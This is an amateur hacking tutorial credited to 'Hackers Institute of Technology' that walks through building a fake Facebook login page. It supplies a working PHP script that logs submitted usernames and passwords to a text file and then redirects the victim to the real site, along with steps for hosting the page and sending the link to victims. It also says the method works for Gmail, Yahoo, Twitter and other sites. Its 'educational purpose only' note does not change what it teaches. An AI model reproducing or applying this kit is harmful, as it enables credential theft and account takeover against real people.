PHISHING

anyone.


education.
has the right to transmit this document through the medium of
email, pen drives , compact discs , etc


www.facebook.com/HackersInTech

Introduction to Phishing :-

Phishing is an attempt to acquire information(and sometimes, indirectly, money) such as
usernames, passwords, and credit card details by masquerading as a trustworthy entity in
an electronic communication. Communications purporting to be from popular social web
sites, auction sites, online payment processors or IT administrators are commonly used to
lure the unsuspecting public.
Phishing is typically carried out by e-mail spoofing or instant messaging,and it often
directs users to enter details at a fake website whose look and feel are almost identical to
the legitimate one.
Phishing is an example of social engineering techniques used to deceive users, and
exploit the poor usability of current web security technologies.


-

Today we will create a Facebook phishing page which will look similar to a Facebook
page but in reality will not be a Facebook Page.
When a victim will enter his username and password , we will be able to see it.

Isn't it interesting?
So, lets start .

ishing Page:-

1. Go to Facebook Home Page(www.facebook.com) ,and then right click with your
mouse, you will see the option "View Page Source", just click on that .

2. Now a New tab will open which will contain a source code, select all the stuff and
paste it in notepad .

3. Now on the same notepad , press CTRL+F,and type ACTION.

4. You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1"

5. Delete all the text written in red and instead of it write post.php.then it will look like...

action="post.php"

6. Now save it on your desktop with the name index.htm,not index.html,remember.

7. Now your phishing page is ready.

8. Now , open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}

fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

9. Now , you have two files , one is index.htm and another is post.php, remember file
extension is important.

10.Now you have to upload these two files on a web hosting site , we prefer you to use
www.000webhost.com to www.my3gb.com.


Here is a look of the web hosting website www.000webhost.com








12. Now you have to make an account on this website and then it will look like a picture
given below :-





13.Now , Go to Control Panel , then on File Manager on the website .

14.After that a new window will pop up. Now go to public_html.



15.Delete the file named default.php,after that upload two files - index.htm and post.php
one by one.





16.Now the last step is to click on View of index.htm and it will look same as facebook
page.


This is our facebook phishing page.

17.Copy the URL of that page and send this link to your victim,when your victim will try
to login in to it with the username and password , this page will redirectly connect to
Facebook , and you will be now able to see his email and password.

18.Now open your 000webhost account and go to file manager and then public_html,here
you will find a new file named username.txt.



19. Click on View Now and you will have your friends email-id and password ,




20.So, this is a simple trick to hack any Facebook account by a Phishing Page.




Note :
Phishing is an illegal activity so don't try it on anyone. This tutorial is for educational
puropose only .
Not only Facebook but you can make any phishing page of any website by following
these steps.
You can hack Gmail,Yahoo,Orkut,Twitter and many more accounts like that.

Thanks for reading this tutorial


Best of Luck!




Created by Hackers Institute of Technology



Copyright Hackers Institute of Technology. All Rights Reserved.